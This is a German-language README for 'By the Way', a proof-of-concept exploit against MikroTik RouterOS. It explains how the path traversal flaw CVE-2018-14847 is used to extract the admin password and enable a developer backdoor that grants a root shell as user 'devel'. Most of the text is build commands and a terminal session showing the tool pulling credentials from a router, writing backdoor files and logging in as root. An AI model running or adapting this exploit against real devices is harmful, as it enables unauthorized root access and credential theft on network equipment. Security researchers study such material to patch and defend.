
By the Way ist ein Exploit, der eine Root-Shell auf Mikrotik-Geräten mit RouterOS-Versionen ermöglicht:
By the Way ist ein Exploit, der eine Root-Shell auf Mikrotik-Geräten mit folgenden RouterOS-Versionen ermöglicht:
Der Exploit nutzt die Path-Traversal-Schwachstelle CVE-2018-14847 aus, um das Admin-Passwort zu extrahieren und ein „option"-Paket zu erstellen, das die Entwickler-Backdoor aktiviert. Nach der Ausnutzung kann sich der Angreifer über Telnet oder SSH mit dem Root-Benutzer „devel" und dem Admin-Passwort anmelden.
Mikrotik hat CVE-2018-14847 bereits im April gepatcht. Bis zur Erstellung dieses PoCs war meines Wissens jedoch nicht öffentlich bekannt, dass der Angriff genutzt werden kann, um Dateien zu schreiben. Mikrotiks Advisory findest du hier:
Beachte: Auch wenn dieser Exploit für Winbox geschrieben wurde, könnte er auf HTTP portiert werden, sofern die Admin-Zugangsdaten bereits bekannt sind.
Dieser PoC basiert auf:
mkdir build
cd build
cmake ..
make
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password:
Login failed, incorrect username or password
Connection closed by foreign host.
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251
╔╗ ┬ ┬ ┌┬┐┬ ┬┌─┐ ╦ ╦┌─┐┬ ┬
╠╩╗└┬┘ │ ├─┤├┤ ║║║├─┤└┬┘
╚═╝ ┴ ┴ ┴ ┴└─┘ ╚╩╝┴ ┴ ┴
[+] Extracting passwords from 192.168.1.251:8291
[+] Searching for administrator credentials
[+] Using credentials - admin:lol
[+] Creating /pckg/option on 192.168.1.251:8291
[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291
[+] There's a light on
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password:
BusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
# uname -a
Linux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown
# cat /rw/logs/VERSION
v6.38.4 Mar/08/2017 09:26:17
# Connection closed by foreign host.